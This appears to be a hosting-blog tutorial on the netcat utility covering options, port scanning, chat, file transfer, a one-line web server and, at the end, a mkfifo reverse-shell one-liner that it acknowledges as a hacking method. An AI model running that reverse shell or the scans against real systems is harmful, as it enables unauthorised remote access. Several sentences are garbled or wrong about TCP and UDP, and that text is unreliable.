The netcat command is necessary for transmitting and receiving data using TCP and UDP protocols. It does not have a large set of functions, but at the same time it is enough to check the connection and simple debugging. How to communicate via TCP protocol? Many users are asking this question. In this article we will answer this question, and also show examples of the real application of the command.
To begin with, let's look at the syntax and the most popular:
-6 – use IPv6 protocol. By default, the -4 and IPv4 parameters are used, respectively;
-h – display help with a list of available parameters;
-i delay – add a delay between sending strings or scanning ports. Set in seconds;
-l – listening mode. Used with port indication;
-N – close the connection when the end of the file is reached when sending it;
-n – Work with IP addresses directly without using DNS, also disable port search;
-P username – specify the username to connect to the proxy;
-x address:port – specify the address and port to connect to the proxy;
-p port – specify the port number. In most cases, the port is read without specifying a parameter;
-U – use UNIX domain socket (for interprocess communication);
-u – use UDP protocol, TCP is used by default;
-v – detailed mode. Used when scanning;
-W number of packets – close the connection after receiving a certain number of packets;
-w timer – enable timer to limit connection time. Set in seconds;
-z – disable sending data. Used when scanning.
The command has the following form:
Next, we will talk about how to use the command.
Checking the port
Verification is the main application of netcat. You should use two parameters -vz, specify the address and port. You can specify a range of addresses, but in this case it is better to filter out only open ports using the grep command. Let's check the ports addresses of the local network:
$ nc -vz 192.168.31.247 8080
$ nc -vz 192.168.31.247 1-1000 2>&1 | grep succeeded
In the same way, we will scan the UDP ports by adding the -u parameter:
$ nc -vzu 192.168.31.247 1-1000 2>&1 | grep succeeded
At the same time, you need to know the main difference between TCP and UDP. So in UDP ports are always available.
The -l parameter is used to listen to the port. It is often enough, but you can turn on the detailed mode:
$ nc -nlv 8080
Remember that when using the TCP protocol, the port must be free, otherwise the error Already in use will appear. At the same time, not all ports can be used by ordinary users, for example, port 80 (HTTP), most likely, it will be occupied by another process, and besides, it will require superuser rights.
The useful ability of the team is data exchange. A simple example is a text chat. In order to start a chat on one computer, run the utility in port listening mode:
$ nc -lp 8080
On another computer, you will need to specify the address of the first computer and the same port. Also don't forget to check that the port is open:
$ nc 0.0.0.0 8080
This way you will be able to send and receive messages. That is, the command is intended for file sharing. The principle is the same, except that it is necessary to redirect the output to a file, namely to paste.txt:
$ nc -l 8080 > paste.txt
On another PC, the input will be a file copy.txt . It would not be superfluous to use the -N parameter to close the connection after transferring the file:
$ nc -N 0.0.0.0 8080 < copy.txt
To transfer files, it is important to follow the sequence, first open the listening and only then send the file. The nc command is a working, but far from the best way to transfer files. There are more effective and useful tools for solving this problem.
Since the NC command does not function with the TCP protocol, it allows both sending and receiving HTTP requests. Therefore, the utility can become the simplest web server. Yes, nothing trickier than a stub page can be done in this way, but the operation will take practically no time, and another plus is that you do not need to install anything additionally.
Using the example, we will form an HTTP response with a file index.html . If we talk about np itself, then it would not be superfluous to set the timer with the -w 1 parameter to break the connection if the browser does not do this:
$ while true; do echo -e "HTTP/1.1 200 OK\n\n$(cat index.html)" | nc -l -w 1 -p 8080; done
To get data from the website, you can form a request and send it to the appropriate address and port. But this method is quite complicated, it is better to use the appropriate CURL command.
Based on the examples discussed above, it will not be difficult to come to the conclusion that the command allows you to organize remote access to the computer shell. Previously, the NC utility had several parameters for opening access to the terminal. The -e parameter has long been removed from the utility, so there will be no easy access to the terminal. The security of the application itself has become higher, but it can still work in conjunction with others.
Let's show the connection using the named mkfifo channel. First of all, we will start listening to the port on the PC on which we will access:
$ nc -lvnp 8080
Let's go directly to the command to open the terminal. First, delete the old named pipe (rm /tmp/f), create a new one in its place (mkfifo /tmp/f), read its contents (cat /tmp/f), and send the shell command (sh -i 2>&1) to its output. After that, it remains to run nc with output to our named pipe (nc 0.0.0.0 8080 >/tmp/f):
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 0.0.0.0 8080 >/tmp/f
Keep in mind that this is one of the hacking methods, however, it can be useful in case of problems with ssh. In order to prevent an attack, configure the security policy and firewall.
Apply the discount by inserting the promo code in the special field at checkout: